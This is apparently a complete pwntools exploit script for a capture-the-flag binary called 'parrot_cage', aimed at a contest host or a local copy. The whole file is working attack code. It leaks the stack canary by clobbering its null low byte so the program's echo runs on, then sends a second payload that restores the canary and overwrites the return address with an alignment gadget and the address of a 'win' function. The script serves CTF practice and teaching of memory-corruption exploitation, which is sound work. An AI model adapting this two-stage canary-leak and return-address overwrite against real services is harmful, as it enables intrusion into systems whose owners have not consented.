#!/usr/bin/env python3
from pwn import *
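# Exploit for the `parrot_cage` challenge: leak the stack canary through the
# program's echo, then overwrite the return address to reach the win function.
#
# Stack layout (recovered with a cyclic pattern / debugger, not derived here):
#   [ buffer: OFFSET_TO_CANARY bytes ][ canary: 8 ][ saved rbp: 8 ][ ret addr ]
# The binary is not position independent, so the two addresses below are
# fixed; they were read off the binary and would change if it is rebuilt.
OFFSET_TO_CANARY = 72            # bytes from the start of the buffer to the canary
CANARY_SIZE = 8                  # x86-64 stack-protector word
SAVED_RBP_SIZE = 8               # saved rbp sits between the canary and the return address
RET_GADGET = 0x000000000040101a  # lone `ret`; keeps rsp 16-byte aligned on entry to win
WIN_ADDR = 0x0000000000401236    # the function we want to return into ("win")

HOST = 'offsec.m0lecon.it'
PORT = 13531


def leak_payload(offset: int = OFFSET_TO_CANARY) -> bytes:
    """Filler that runs exactly one byte past the buffer.

    The low byte of a glibc canary is always 0x00, which acts as a string
    terminator and stops the program's echo right at the buffer's end.
    Clobbering that one byte lets the echo run on into the remaining seven
    canary bytes, which is what `parse_canary_leak` reads back.
    """
    return b"A" * (offset + 1)


def parse_canary_leak(line: bytes, offset: int = OFFSET_TO_CANARY) -> int:
    """Rebuild the canary from the line the program echoed back.

    `line` is expected to start with the filler from `leak_payload` (the
    echoed buffer was observed to begin at column 0 of the line). The byte at
    `offset` is the one we overwrote, so it is skipped; the seven bytes after
    it are the real canary bytes, and the known 0x00 low byte is restored in
    front of them before the little-endian conversion.

    Raises ValueError when fewer than seven bytes follow the filler. That
    happens when the canary itself contains 0x0a (recvline stops there) or
    0x00 (the echo stops there); a truncated leak would otherwise produce a
    wrong canary and the second stage would just abort the remote process,
    so fail loudly and re-run instead.

    Note: the slice is deliberately NOT .strip()'d — canary bytes are random,
    and stripping would silently drop leading/trailing whitespace-valued
    bytes (0x09, 0x0d, 0x20, ...), mis-aligning the value.
    """
    start = offset + 1                           # skip the byte we clobbered
    leaked = line[start:start + CANARY_SIZE - 1]
    if len(leaked) != CANARY_SIZE - 1:
        raise ValueError(
            f"expected {CANARY_SIZE - 1} canary bytes after the filler, "
            f"got {len(leaked)} (leak truncated?): {line!r}"
        )
    return int.from_bytes(b"\x00" + leaked, byteorder="little")


def overwrite_payload(canary: int, offset: int = OFFSET_TO_CANARY) -> bytes:
    """Build the second-stage input: filler, intact canary, rbp, ret gadget, win.

    Putting the recovered canary back in place keeps __stack_chk_fail quiet;
    the saved rbp is don't-care. RET_GADGET is a single `ret` inserted so that
    rsp is 16-byte aligned when WIN_ADDR starts executing (SSE instructions in
    libc fault otherwise). Words are packed little-endian, 64-bit.
    """
    return b"".join((
        b"A" * offset,
        canary.to_bytes(CANARY_SIZE, "little"),
        b"B" * SAVED_RBP_SIZE,
        RET_GADGET.to_bytes(8, "little"),
        WIN_ADDR.to_bytes(8, "little"),
    ))


def main() -> None:
    """Run the two-stage exploit against the remote (or a local process with LOCAL=1)."""
    elf = context.binary = ELF('./parrot_cage', checksec=False)
    # `python3 exploit.py LOCAL` uses pwntools' args to target the local binary.
    p = process(elf.path) if args.LOCAL else remote(HOST, PORT)
    try:
        for _ in range(4):
            print(p.recvline())                  # banner lines, kept only for visibility

        # Stage 1: leak the canary.
        p.send(leak_payload())
        p.recvline()                             # one response line precedes the echoed buffer
        canary = parse_canary_leak(p.recvline())
        print(f"Canary: {canary:#018x}")

        # Stage 2: rewrite the frame and trigger the return.
        p.send(overwrite_payload(canary))
        p.sendline(b'bye')                       # makes the vulnerable function return
        print(p.recvline())
        p.interactive()
    finally:
        p.close()                                # don't leak the socket/process on error


if __name__ == "__main__":
    main()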